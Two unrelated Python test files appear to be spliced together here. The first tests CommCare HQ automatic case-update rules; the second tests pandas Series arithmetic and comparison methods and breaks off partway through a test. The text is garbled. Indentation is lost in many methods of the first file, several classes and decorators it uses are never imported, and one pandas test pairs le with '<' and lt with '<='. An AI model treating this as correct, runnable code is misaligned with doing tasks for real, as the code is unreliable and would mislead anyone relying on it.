from corehq.apps.data_interfaces.tasks import run_case_update_rules_for_domain
from datetime import datetime, date
from corehq.form_processor.backends.sql.dbaccessors import CaseAccessorSQL
from corehq.form_processor.interfaces.dbaccessors import CaseAccessors
from corehq.form_processor.tests.utils import (run_with_all_backends, FormProcessorTestUtils,
set_case_property_directly)
from corehq.form_processor.utils.general import should_use_sql_backend
from corehq.form_processor.signals import sql_case_post_save
from corehq.util.test_utils import set_parent_case as set_actual_parent_case, update_case
from django.test import TestCase
from mock import patch
from corehq.util.context_managers import drop_connected_signals
from toggle.shortcuts import update_toggle_cache
from corehq.toggles import NAMESPACE_DOMAIN, AUTO_CASE_UPDATE_ENHANCEMENTS, RUN_AUTO_CASE_UPDATES_ON_SAVE
from corehq.apps import hqcase
class AutomaticCaseUpdateTest(TestCase):
    def setUp(self):
        """Enable the feature toggles, create five update rules and one test case.

        Rules created:
          * rule  -- update update_flag='Y' when last_visit_date is 30+ days old
          * rule2 -- close 'test-case-type-2' cases (server-modified bound 30 days)
          * rule3 -- close 'test-case-type-2' cases (server-modified bound 50 days)
          * rule4 -- update update_flag='C' AND close when last_visit_date is 40+ days old
          * rule5 -- on-save rule (no server-modified filter) setting after_save='updated'
            for cases named 'signal'
        """
        super(AutomaticCaseUpdateTest, self).setUp()
        self.domain = 'auto-update-test'
        update_toggle_cache(AUTO_CASE_UPDATE_ENHANCEMENTS.slug, self.domain, True, NAMESPACE_DOMAIN)
        update_toggle_cache(RUN_AUTO_CASE_UPDATES_ON_SAVE.slug, self.domain, True, NAMESPACE_DOMAIN)
        self.case_db = CaseAccessors(self.domain)
        self.factory = CaseFactory(self.domain)
        self.rule = AutomaticUpdateRule(
            domain=self.domain,
            name='test-rule',
            case_type='test-case-type',
            active=True,
            server_modified_boundary=30,
        )
        self.rule.save()
        AutomaticUpdateRuleCriteria.objects.create(
            property_name='last_visit_date',
            property_value='30',
            match_type=AutomaticUpdateRuleCriteria.MATCH_DAYS_AFTER,
            rule=self.rule,
        )
        AutomaticUpdateAction.objects.create(
            action=AutomaticUpdateAction.ACTION_UPDATE,
            property_name='update_flag',
            property_value='Y',
            rule=self.rule,
        )
        self.rule2 = AutomaticUpdateRule(
            domain=self.domain,
            name='test-rule-2',
            case_type='test-case-type-2',
            active=True,
            server_modified_boundary=30,
        )
        self.rule2.save()
        AutomaticUpdateAction.objects.create(
            action=AutomaticUpdateAction.ACTION_CLOSE,
            rule=self.rule2,
        )
        self.rule3 = AutomaticUpdateRule(
            domain=self.domain,
            name='test-rule-3',
            case_type='test-case-type-2',
            active=True,
            server_modified_boundary=50,
        )
        self.rule3.save()
        AutomaticUpdateAction.objects.create(
            action=AutomaticUpdateAction.ACTION_CLOSE,
            rule=self.rule3,
        )
        self.rule4 = AutomaticUpdateRule(
            domain=self.domain,
            name='test-rule-4',
            case_type='test-case-type',
            active=True,
            server_modified_boundary=30,
        )
        self.rule4.save()
        AutomaticUpdateRuleCriteria.objects.create(
            property_name='last_visit_date',
            property_value='40',
            match_type=AutomaticUpdateRuleCriteria.MATCH_DAYS_AFTER,
            rule=self.rule4,
        )
        AutomaticUpdateAction.objects.create(
            action=AutomaticUpdateAction.ACTION_UPDATE,
            property_name='update_flag',
            property_value='C',
            rule=self.rule4,
        )
        AutomaticUpdateAction.objects.create(
            action=AutomaticUpdateAction.ACTION_CLOSE,
            rule=self.rule4,
        )
        self.rule5 = AutomaticUpdateRule(
            domain=self.domain,
            name='test-rule-5',
            case_type='test-case-type-3',
            active=True,
            filter_on_server_modified=False
        )
        self.rule5.save()
        AutomaticUpdateRuleCriteria.objects.create(
            property_name='name',
            property_value='signal',
            match_type=AutomaticUpdateRuleCriteria.MATCH_EQUAL,
            rule=self.rule5,
        )
        AutomaticUpdateAction.objects.create(
            action=AutomaticUpdateAction.ACTION_UPDATE,
            property_name='after_save',
            property_value='updated',
            rule=self.rule5,
        )
        # Create the case with the post-save signal suppressed so no rule
        # fires during fixture setup.
        with drop_connected_signals(case_post_save):
            case = self.factory.create_case(case_type='test-case-type')
        self.case_id = case.case_id
def tearDown(self):
AutomaticUpdateRuleCriteria.objects.all().delete()
AutomaticUpdateAction.objects.all().delete()
AutomaticUpdateRule.objects.all().delete()
FormProcessorTestUtils.delete_all_cases(self.domain)
super(AutomaticCaseUpdateTest, self).tearDown()
def _get_case_ids(self, *args, **kwargs):
return [self.case_id]
    def _get_case(self):
        """Fetch the current persisted state of the test case from the case db."""
        return self.case_db.get_case(self.case_id)
def _assert_case_revision(self, rev_number, last_modified, expect_modified=False):
if should_use_sql_backend(self.domain):
self.assertEqual(
expect_modified,
CaseAccessorSQL.case_modified_since(self.case_id, last_modified)
)
else:
doc = self._get_case()
self.assertTrue(doc['_rev'].startswith('%s-' % rev_number))
    @run_with_all_backends
    def test_rule(self):
        """End-to-end rule run: an update only fires when BOTH
        server_modified_on and last_visit_date are past the 30-day boundary;
        re-running on an unchanged case is a no-op; a much older visit date
        additionally closes the case (rule4's 40-day close criteria).
        """
        now = datetime(2015, 10, 22, 0, 0)
        with patch('corehq.apps.data_interfaces.models.AutomaticUpdateRule.get_case_ids', new=self._get_case_ids):
            # No update: both dates are 27 days away
            last_modified = datetime(2015, 9, 25, 12, 0)
            _update_case(self.domain, self.case_id, last_modified, date(2015, 9, 25))
            self._assert_case_revision(2, last_modified)
            run_case_update_rules_for_domain(self.domain, now=now)
            self._assert_case_revision(2, last_modified)
            # No update: server_modified_on is 32 days away but last_visit_date is 27 days away
            last_modified = datetime(2015, 9, 20, 12, 0)
            _update_case(self.domain, self.case_id, last_modified, date(2015, 9, 25))
            self._assert_case_revision(3, last_modified)
            run_case_update_rules_for_domain(self.domain, now=now)
            self._assert_case_revision(3, last_modified)
            # No update: last_visit_date is 32 days away but server_modified_on is 27 days away
            last_modified = datetime(2015, 9, 25, 12, 0)
            _update_case(self.domain, self.case_id, last_modified, date(2015, 9, 20))
            self._assert_case_revision(4, last_modified)
            run_case_update_rules_for_domain(self.domain, now=now)
            self._assert_case_revision(4, last_modified)
            # Perform update: both dates are 32 days away
            last_modified = datetime(2015, 9, 20, 12, 0)
            _update_case(self.domain, self.case_id, last_modified, date(2015, 9, 20))
            self._assert_case_revision(5, last_modified)
            with drop_connected_signals(case_post_save):
                run_case_update_rules_for_domain(self.domain, now=now)
            # rev bumps to 6: the rule wrote update_flag=Y
            self._assert_case_revision(6, last_modified, True)
            case = self._get_case()
            self.assertEqual(case.get_case_property('update_flag'), 'Y')
            # No update: case state matches final state
            _update_case(self.domain, self.case_id, last_modified, date(2015, 9, 20))
            self._assert_case_revision(7, last_modified)
            with drop_connected_signals(case_post_save):
                run_case_update_rules_for_domain(self.domain, now=now)
            self._assert_case_revision(7, last_modified)
            # Perform update: case closed because date is 42 days away
            _update_case(self.domain, self.case_id, last_modified, date(2015, 9, 10))
            with drop_connected_signals(case_post_save):
                run_case_update_rules_for_domain(self.domain, now=now)
            case = self._get_case()
            self.assertEqual(case.get_case_property('update_flag'), 'C')
            self.assertEqual(case.closed, True)
@run_with_all_backends
def test_match_days_after(self):
with _with_case(self.domain, 'test-case-type-2', datetime(2015, 1, 1)) as case:
AutomaticUpdateRuleCriteria.objects.create(
property_name='last_visit_date',
property_value='30',
match_type=AutomaticUpdateRuleCriteria.MATCH_DAYS_AFTER,
rule=self.rule2,
)
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'last_visit_date', '2015-12-30')
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'last_visit_date', '2015-12-03')
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'last_visit_date', '2015-12-02')
self.assertTrue(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'last_visit_date', '2015-11-01')
self.assertTrue(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
@run_with_all_backends
def test_match_days_before(self):
with _with_case(self.domain, 'test-case-type-2', datetime(2015, 1, 1)) as case:
AutomaticUpdateRuleCriteria.objects.create(
property_name='last_visit_date',
property_value='30',
match_type=AutomaticUpdateRuleCriteria.MATCH_DAYS_BEFORE,
rule=self.rule2,
)
# When the case property doesn't exist, it should not match
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'last_visit_date', '2015-10-01')
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'last_visit_date', '2016-01-02')
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'last_visit_date', '2016-01-31')
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'last_visit_date', '2016-02-01')
self.assertTrue(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'last_visit_date', '2016-03-01')
self.assertTrue(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
@run_with_all_backends
def test_match_equal(self):
with _with_case(self.domain, 'test-case-type-2', datetime(2015, 1, 1)) as case:
AutomaticUpdateRuleCriteria.objects.create(
property_name='property1',
property_value='value1',
match_type=AutomaticUpdateRuleCriteria.MATCH_EQUAL,
rule=self.rule2,
)
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'property1', 'x')
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'property1', 'value1')
self.assertTrue(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
@run_with_all_backends
def test_match_not_equal(self):
with _with_case(self.domain, 'test-case-type-2', datetime(2015, 1, 1)) as case:
AutomaticUpdateRuleCriteria.objects.create(
property_name='property2',
property_value='value2',
match_type=AutomaticUpdateRuleCriteria.MATCH_NOT_EQUAL,
rule=self.rule2,
)
self.assertTrue(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'property2', 'value2')
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'property2', 'x')
self.assertTrue(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
@run_with_all_backends
def test_date_case_properties_for_equality(self):
"""
Date case properties are automatically converted from string to date
when fetching from the db, so here we want to make sure this doesn't
interfere with our ability to compare dates for equality.
"""
with _with_case(self.domain, 'test-case-type-2', datetime(2015, 1, 1)) as case:
AutomaticUpdateRuleCriteria.objects.create(
property_name='property1',
property_value='2016-02-24',
match_type=AutomaticUpdateRuleCriteria.MATCH_EQUAL,
rule=self.rule2,
)
set_case_property_directly(case, 'property1', '2016-02-24')
self.assertTrue(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'property1', '2016-02-25')
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
@run_with_all_backends
def test_date_case_properties_for_inequality(self):
with _with_case(self.domain, 'test-case-type-2', datetime(2015, 1, 1)) as case:
AutomaticUpdateRuleCriteria.objects.create(
property_name='property1',
property_value='2016-02-24',
match_type=AutomaticUpdateRuleCriteria.MATCH_NOT_EQUAL,
rule=self.rule2,
)
set_case_property_directly(case, 'property1', '2016-02-24')
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'property1', '2016-02-25')
self.assertTrue(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
@run_with_all_backends
def test_match_has_value(self):
with _with_case(self.domain, 'test-case-type-2', datetime(2015, 1, 1)) as case:
AutomaticUpdateRuleCriteria.objects.create(
property_name='property3',
match_type=AutomaticUpdateRuleCriteria.MATCH_HAS_VALUE,
rule=self.rule2,
)
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'property3', 'x')
self.assertTrue(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'property3', '')
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
@run_with_all_backends
def test_and_criteria(self):
with _with_case(self.domain, 'test-case-type-2', datetime(2015, 1, 1)) as case:
AutomaticUpdateRuleCriteria.objects.create(
property_name='last_visit_date',
property_value='30',
match_type=AutomaticUpdateRuleCriteria.MATCH_DAYS_AFTER,
rule=self.rule2,
)
AutomaticUpdateRuleCriteria.objects.create(
property_name='property1',
property_value='value1',
match_type=AutomaticUpdateRuleCriteria.MATCH_EQUAL,
rule=self.rule2,
)
AutomaticUpdateRuleCriteria.objects.create(
property_name='property2',
property_value='value2',
match_type=AutomaticUpdateRuleCriteria.MATCH_NOT_EQUAL,
rule=self.rule2,
)
AutomaticUpdateRuleCriteria.objects.create(
property_name='property3',
match_type=AutomaticUpdateRuleCriteria.MATCH_HAS_VALUE,
rule=self.rule2,
)
set_case_property_directly(case, 'last_visit_date', '2015-11-01')
set_case_property_directly(case, 'property1', 'value1')
set_case_property_directly(case, 'property2', 'x')
set_case_property_directly(case, 'property3', 'x')
self.assertTrue(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'last_visit_date', '2015-12-30')
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'last_visit_date', '2015-11-01')
set_case_property_directly(case, 'property1', 'x')
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'property1', 'value1')
set_case_property_directly(case, 'property2', 'value2')
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'property2', 'x')
set_case_property_directly(case, 'property3', '')
self.assertFalse(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
set_case_property_directly(case, 'property3', 'x')
self.assertTrue(self.rule2.rule_matches_case(case, datetime(2016, 1, 1)))
def test_get_rules_from_domain(self):
rules = AutomaticUpdateRule.by_domain(self.domain)
rules_by_case_type = AutomaticUpdateRule.organize_rules_by_case_type(rules)
expected_case_types = ['test-case-type', 'test-case-type-2', 'test-case-type-3']
actual_case_types = rules_by_case_type.keys()
self.assertEqual(set(expected_case_types), set(actual_case_types))
expected_rule_ids = [self.rule.pk, self.rule4.pk]
actual_rule_ids = [rule.pk for rule in rules_by_case_type['test-case-type']]
self.assertEqual(set(expected_rule_ids), set(actual_rule_ids))
expected_rule_ids = [self.rule2.pk, self.rule3.pk]
actual_rule_ids = [rule.pk for rule in rules_by_case_type['test-case-type-2']]
self.assertEqual(set(expected_rule_ids), set(actual_rule_ids))
expected_rule_ids = [self.rule5.pk]
actual_rule_ids = [rule.pk for rule in rules_by_case_type['test-case-type-3']]
self.assertEqual(set(expected_rule_ids), set(actual_rule_ids))
def test_boundary_date(self):
rules = AutomaticUpdateRule.by_domain(self.domain)
rules_by_case_type = AutomaticUpdateRule.organize_rules_by_case_type(rules)
boundary_date = AutomaticUpdateRule.get_boundary_date(
rules_by_case_type['test-case-type'], datetime(2016, 1, 1))
self.assertEqual(boundary_date, datetime(2015, 12, 2))
boundary_date = AutomaticUpdateRule.get_boundary_date(
rules_by_case_type['test-case-type-2'], datetime(2016, 1, 1))
self.assertEqual(boundary_date, datetime(2015, 12, 2))
    @run_with_all_backends
    def test_parent_cases(self):
        """Criteria and actions may reference the parent case via the
        'parent/' prefix: a rule can match on a parent property, write to a
        parent property, and copy a parent property onto the child."""
        with _with_case(self.domain, 'test-child-case-type', datetime(2016, 1, 1)) as child, \
                _with_case(self.domain, 'test-parent-case-type', datetime(2016, 1, 1), case_name='abc') as parent:
            # Set the parent case relationship
            child = set_parent_case(self.domain, child, parent)
            # Create a rule that references parent/name which should match
            rule = AutomaticUpdateRule(
                domain=self.domain,
                name='test-parent-rule',
                case_type='test-child-case-type',
                active=True,
                server_modified_boundary=30,
            )
            rule.save()
            self.addCleanup(rule.delete)
            AutomaticUpdateRuleCriteria.objects.create(
                property_name='parent/name',
                property_value='abc',
                match_type=AutomaticUpdateRuleCriteria.MATCH_EQUAL,
                rule=rule,
            )
            # Action 1: write to a property on the parent case.
            AutomaticUpdateAction.objects.create(
                action=AutomaticUpdateAction.ACTION_UPDATE,
                property_name='parent/update_flag',
                property_value='P',
                rule=rule,
            )
            # Action 2: copy the parent's name onto the child (value is a
            # case-property reference, not a literal).
            AutomaticUpdateAction.objects.create(
                action=AutomaticUpdateAction.ACTION_UPDATE,
                property_name='parent_name',
                property_value='parent/name',
                property_value_type=AutomaticUpdateAction.CASE_PROPERTY,
                rule=rule,
            )
            # rule should match on parent case property and update parent case
            rule.apply_rule(child, datetime(2016, 3, 1))
            updated_parent = self.case_db.get_case(parent.case_id)
            updated_child = self.case_db.get_case(child.case_id)
            self.assertEqual(updated_parent.get_case_property('update_flag'), 'P')
            self.assertEqual(updated_child.get_case_property('parent_name'), 'abc')
            # Update the rule to match on a different name and now it shouldn't match
            rule.automaticupdaterulecriteria_set.all().delete()
            AutomaticUpdateRuleCriteria.objects.create(
                property_name='parent/name',
                property_value='def',
                match_type=AutomaticUpdateRuleCriteria.MATCH_EQUAL,
                rule=rule,
            )
            self.assertFalse(rule.rule_matches_case(child, datetime(2016, 3, 1)))
@run_with_all_backends
def test_no_server_boundary(self):
with _with_case(self.domain, 'test-case-type-3', datetime(2016, 1, 1), case_name='signal') as case:
# no filtering on server modified date so same day matches
self.assertTrue(self.rule5.rule_matches_case(case, datetime(2016, 1, 1)))
@run_with_all_backends
def test_run_on_save(self):
with _with_case(self.domain, 'test-case-type-3', datetime(2016, 1, 1), case_name='signal') as case:
with patch('corehq.apps.data_interfaces.models.AutomaticUpdateRule.apply_rule') as apply:
# property is updated after save signal (case update used to force save)
update_case(self.domain, case.case_id, {})
apply.assert_called_once()
@run_with_all_backends
def test_early_task_exit(self):
with _with_case(self.domain, 'test-case-type-3', datetime(2016, 1, 1), case_name='signal') as case:
with patch('corehq.apps.data_interfaces.models.AutomaticUpdateRule.apply_rule') as apply:
hqcase.utils.update_case(case.domain, case.case_id, case_properties={}, xmlns=AUTO_UPDATE_XMLNS)
apply.assert_not_called()
@contextmanager
def _with_case(domain, case_type, last_modified, **kwargs):
    """Yield a freshly created case of ``case_type`` whose server_modified_on
    is pinned to ``last_modified``; the case is deleted on exit."""
    with drop_connected_signals(case_post_save), drop_connected_signals(sql_case_post_save):
        case = CaseFactory(domain).create_case(case_type=case_type, **kwargs)
        _update_case(domain, case.case_id, last_modified)
    case = CaseAccessors(domain).get_case(case.case_id)
    try:
        yield case
    finally:
        # Clean up through whichever backend owns the case.
        if should_use_sql_backend(domain):
            CaseAccessorSQL.hard_delete_cases(domain, [case.case_id])
        else:
            case.delete()
def _save_case(domain, case):
    """Persist ``case`` without clobbering its server_modified_on value."""
    if not should_use_sql_backend(domain):
        # can't call case.save() since it overrides the server_modified_on property
        CommCareCase.get_db().save_doc(case.to_json())
        return
    CaseAccessorSQL.save_case(case)
def _update_case(domain, case_id, server_modified_on, last_visit_date=None):
    """Set server_modified_on (and optionally the last_visit_date property,
    formatted YYYY-MM-DD) on the case, then save it."""
    case = CaseAccessors(domain).get_case(case_id)
    case.server_modified_on = server_modified_on
    if last_visit_date:
        set_case_property_directly(
            case, 'last_visit_date', last_visit_date.strftime('%Y-%m-%d'))
    _save_case(domain, case)
def set_parent_case(domain, child_case, parent_case):
    """Attach ``parent_case`` as the parent of ``child_case`` while preserving
    the child's original server_modified_on; return the refreshed child."""
    accessors = CaseAccessors(domain)
    original_modified_on = child_case.server_modified_on
    set_actual_parent_case(domain, child_case, parent_case)
    # Re-fetch and restore the timestamp the parent-linking update overwrote.
    refreshed_child = accessors.get_case(child_case.case_id)
    refreshed_child.server_modified_on = original_modified_on
    _save_case(domain, refreshed_child)
    return accessors.get_case(refreshed_child.case_id)
| |
from datetime import timedelta
import operator
import numpy as np
import pytest
import pytz
from pandas._libs.tslibs import IncompatibleFrequency
import pandas as pd
from pandas import Categorical, Index, Series, bdate_range, date_range, isna
import pandas._testing as tm
from pandas.core import nanops, ops
def _permute(obj):
return obj.take(np.random.permutation(len(obj)))
class TestSeriesFlexArithmetic:
    """Tests for the named (flex) arithmetic methods: Series.add, .sub, etc."""

    @pytest.mark.parametrize(
        "ts",
        [
            (lambda x: x, lambda x: x * 2, False),
            (lambda x: x, lambda x: x[::2], False),
            (lambda x: x, lambda x: 5, True),
            (lambda x: tm.makeFloatSeries(), lambda x: tm.makeFloatSeries(), True),
        ],
    )
    @pytest.mark.parametrize(
        "opname", ["add", "sub", "mul", "floordiv", "truediv", "pow"]
    )
    def test_flex_method_equivalence(self, opname, ts):
        # check that Series.{opname} behaves like Series.__{opname}__,
        tser = tm.makeTimeSeries().rename("ts")
        # ts is (make_lhs, make_rhs, check_reverse)
        series = ts[0](tser)
        other = ts[1](tser)
        check_reverse = ts[2]
        op = getattr(Series, opname)
        alt = getattr(operator, opname)
        result = op(series, other)
        expected = alt(series, other)
        tm.assert_almost_equal(result, expected)
        if check_reverse:
            # the reflected method (e.g. radd) must mirror the swapped operands
            rop = getattr(Series, "r" + opname)
            result = rop(series, other)
            expected = alt(other, series)
            tm.assert_almost_equal(result, expected)

    def test_flex_method_subclass_metadata_preservation(self, all_arithmetic_operators):
        # GH 13208: _metadata attributes must survive arithmetic on subclasses
        class MySeries(Series):
            _metadata = ["x"]

            @property
            def _constructor(self):
                return MySeries

        opname = all_arithmetic_operators
        op = getattr(Series, opname)
        m = MySeries([1, 2, 3], name="test")
        m.x = 42
        result = op(m, 1)
        assert result.x == 42

    def test_flex_add_scalar_fill_value(self):
        # GH12723: fill_value applies to NaNs before adding the scalar
        s = Series([0, 1, np.nan, 3, 4, 5])
        exp = s.fillna(0).add(2)
        res = s.add(2, fill_value=0)
        tm.assert_series_equal(res, exp)

    # Class-level setup: build (flex_method, equivalent_operator, fill_value)
    # triples for test_operators_combine, including the reflected methods.
    pairings = [(Series.div, operator.truediv, 1), (Series.rdiv, ops.rtruediv, 1)]
    for op in ["add", "sub", "mul", "pow", "truediv", "floordiv"]:
        fv = 0
        lop = getattr(Series, op)
        lequiv = getattr(operator, op)
        rop = getattr(Series, "r" + op)
        # bind op at definition time...
        requiv = lambda x, y, op=op: getattr(operator, op)(y, x)
        pairings.append((lop, lequiv, fv))
        pairings.append((rop, requiv, fv))

    @pytest.mark.parametrize("op, equiv_op, fv", pairings)
    def test_operators_combine(self, op, equiv_op, fv):
        def _check_fill(meth, op, a, b, fill_value=0):
            # Expected: apply op elementwise over the union index, substituting
            # fill_value where exactly one side is missing, NaN where both are.
            exp_index = a.index.union(b.index)
            a = a.reindex(exp_index)
            b = b.reindex(exp_index)
            amask = isna(a)
            bmask = isna(b)
            exp_values = []
            for i in range(len(exp_index)):
                with np.errstate(all="ignore"):
                    if amask[i]:
                        if bmask[i]:
                            exp_values.append(np.nan)
                            continue
                        exp_values.append(op(fill_value, b[i]))
                    elif bmask[i]:
                        if amask[i]:
                            exp_values.append(np.nan)
                            continue
                        exp_values.append(op(a[i], fill_value))
                    else:
                        exp_values.append(op(a[i], b[i]))
            result = meth(a, b, fill_value=fill_value)
            expected = Series(exp_values, exp_index)
            tm.assert_series_equal(result, expected)

        a = Series([np.nan, 1.0, 2.0, 3.0, np.nan], index=np.arange(5))
        b = Series([np.nan, 1, np.nan, 3, np.nan, 4.0], index=np.arange(6))
        result = op(a, b)
        exp = equiv_op(a, b)
        tm.assert_series_equal(result, exp)
        _check_fill(op, equiv_op, a, b, fill_value=fv)
        # should accept axis=0 or axis='rows'
        op(a, b, axis=0)
class TestSeriesArithmetic:
    # Some of these may end up in tests/arithmetic, but are not yet sorted

    def test_add_series_with_period_index(self):
        """Adding PeriodIndex-backed Series aligns on periods; mismatched
        frequencies raise IncompatibleFrequency."""
        rng = pd.period_range("1/1/2000", "1/1/2010", freq="A")
        ts = Series(np.random.randn(len(rng)), index=rng)
        result = ts + ts[::2]
        expected = ts + ts
        # slots missing from the every-other-element operand become NaN
        expected.iloc[1::2] = np.nan
        tm.assert_series_equal(result, expected)
        # alignment is by label, so a permuted operand gives the same result
        result = ts + _permute(ts[::2])
        tm.assert_series_equal(result, expected)
        msg = "Input has different freq=D from PeriodIndex\\(freq=A-DEC\\)"
        with pytest.raises(IncompatibleFrequency, match=msg):
            ts + ts.asfreq("D", how="end")

    @pytest.mark.parametrize(
        "target_add,input_value,expected_value",
        [
            ("!", ["hello", "world"], ["hello!", "world!"]),
            ("m", ["hello", "world"], ["hellom", "worldm"]),
        ],
    )
    def test_string_addition(self, target_add, input_value, expected_value):
        # GH28658 - ensure adding 'm' does not raise an error
        a = Series(input_value)
        result = a + target_add
        expected = Series(expected_value)
        tm.assert_series_equal(result, expected)

    def test_divmod(self):
        # GH#25557: Series.divmod/rdivmod mirror the builtin divmod
        a = Series([1, 1, 1, np.nan], index=["a", "b", "c", "d"])
        b = Series([2, np.nan, 1, np.nan], index=["a", "b", "d", "e"])
        result = a.divmod(b)
        expected = divmod(a, b)
        tm.assert_series_equal(result[0], expected[0])
        tm.assert_series_equal(result[1], expected[1])
        result = a.rdivmod(b)
        expected = divmod(b, a)
        tm.assert_series_equal(result[0], expected[0])
        tm.assert_series_equal(result[1], expected[1])

    @pytest.mark.parametrize("index", [None, range(9)])
    def test_series_integer_mod(self, index):
        # GH#24396: int % str raises TypeError rather than something cryptic
        s1 = Series(range(1, 10))
        s2 = Series("foo", index=index)
        msg = "not all arguments converted during string formatting"
        with pytest.raises(TypeError, match=msg):
            s2 % s1

    def test_add_with_duplicate_index(self):
        # GH14227: duplicate labels broadcast against the matching label
        s1 = Series([1, 2], index=[1, 1])
        s2 = Series([10, 10], index=[1, 2])
        result = s1 + s2
        expected = pd.Series([11, 12, np.nan], index=[1, 1, 2])
        tm.assert_series_equal(result, expected)

    def test_add_na_handling(self):
        """Decimal values with a shifted (NaN-introducing) operand produce NA."""
        from decimal import Decimal
        from datetime import date

        s = Series(
            [Decimal("1.3"), Decimal("2.3")], index=[date(2012, 1, 1), date(2012, 1, 2)]
        )
        result = s + s.shift(1)
        result2 = s.shift(1) + s
        assert isna(result[0])
        assert isna(result2[0])

    def test_add_corner_cases(self, datetime_series):
        empty = Series([], index=Index([]), dtype=np.float64)
        # adding an empty series NaN-fills everything
        result = datetime_series + empty
        assert np.isnan(result).all()
        result = empty + empty.copy()
        assert len(result) == 0
        # FIXME: dont leave commented-out
        # TODO: this returned NotImplemented earlier, what to do?
        # deltas = Series([timedelta(1)] * 5, index=np.arange(5))
        # sub_deltas = deltas[::2]
        # deltas5 = deltas * 5
        # deltas = deltas + sub_deltas
        # float + int
        int_ts = datetime_series.astype(int)[:-5]
        added = datetime_series + int_ts
        expected = Series(
            datetime_series.values[:-5] + int_ts.values,
            index=datetime_series.index[:-5],
            name="ts",
        )
        tm.assert_series_equal(added[:-5], expected)

    def test_mul_empty_int_corner_case(self):
        # multiplying an empty int series by a float series aligns to NaN
        s1 = Series([], [], dtype=np.int32)
        s2 = Series({"x": 0.0})
        tm.assert_series_equal(s1 * s2, Series([np.nan], index=["x"]))

    def test_sub_datetimelike_align(self):
        # GH#7500
        # datetimelike ops need to align
        dt = Series(date_range("2012-1-1", periods=3, freq="D"))
        dt.iloc[2] = np.nan
        dt2 = dt[::-1]
        expected = Series([timedelta(0), timedelta(0), pd.NaT])
        # name is reset
        result = dt2 - dt
        tm.assert_series_equal(result, expected)
        expected = Series(expected, name=0)
        result = (dt2.to_frame() - dt.to_frame())[0]
        tm.assert_series_equal(result, expected)
# ------------------------------------------------------------------
# Comparisons
class TestSeriesFlexComparison:
def test_comparison_flex_basic(self):
left = pd.Series(np.random.randn(10))
right = pd.Series(np.random.randn(10))
tm.assert_series_equal(left.eq(right), left == right)
tm.assert_series_equal(left.ne(right), left != right)
tm.assert_series_equal(left.le(right), left < right)
tm.assert_series_equal(left.lt(right), left <= right)
tm.assert_series_equal(left.gt(right), left > right)
tm.assert_series_equal(left.ge(right), left >= right)
# axis
for axis in [0, None, "index"]:
tm.assert_series_equal(left.eq(right, axis=axis), left == right)
tm.assert_series_equal(left.ne(right, axis=axis), left != right)
tm.assert_series_equal(left.le(right, axis=axis), left < right)
tm.assert_series_equal(left.lt(right, axis=axis), left <= right)
tm.assert_series_equal(left.gt(right, axis=axis), left > right)
tm.assert_series_equal(left.ge(right, axis=axis), left >= right)
#
msg = "No axis named 1 for object type"
for op in ["eq", "ne", "le", "le", "gt", "ge"]:
with pytest.raises(ValueError, match=msg):
getattr(left, op)(right, axis=1)
def test_comparison_flex_alignment(self):
left = Series([1, 3, 2], index=list("abc"))
right = Series([2, 2, 2], index=list("bcd"))
exp = pd.Series([False, False, True, False], index=list("abcd"))
tm.assert_series_equal(left.eq(right), exp)
exp = pd.Series([True, True, False, True], index=list("abcd"))
tm.assert_series_equal(left.ne(right), exp)
exp = pd.Series([False, False, True, False], index=list("abcd"))
tm.assert_series_equal(left.le(right), exp)
exp = pd.Series([False, False, False, False], index=list("abcd"))
tm.assert_series_equal(left.lt(right), exp)
exp = pd.Series([False, True, True, False], index=list("abcd"))
tm.assert_series_equal(left.ge(right), exp)
exp = pd.Series([False, True, False, False], index=list("abcd"))
tm.assert_series_equal(left.gt(right), exp)
def test_comparison_flex_alignment_fill(self):
left = Series([1, 3, 2], index=list("abc"))
right = Series([2, 2, 2], index=list("bcd"))
exp = pd.Series([False, False, True, True], index=list("abcd"))
tm.assert_series_equal(left.eq(right, fill_value=2), exp)
exp = pd.Series([True, True, False, False], index=list("abcd"))
tm.assert_series_equal(left.ne(right, fill_value=2), exp)
exp = pd.Series([False, False, True, True], index=list("abcd"))
tm.assert_series_equal(left.le(right, fill_value=0), exp)
exp = pd.Series([False, False, False, True], index=list("abcd"))
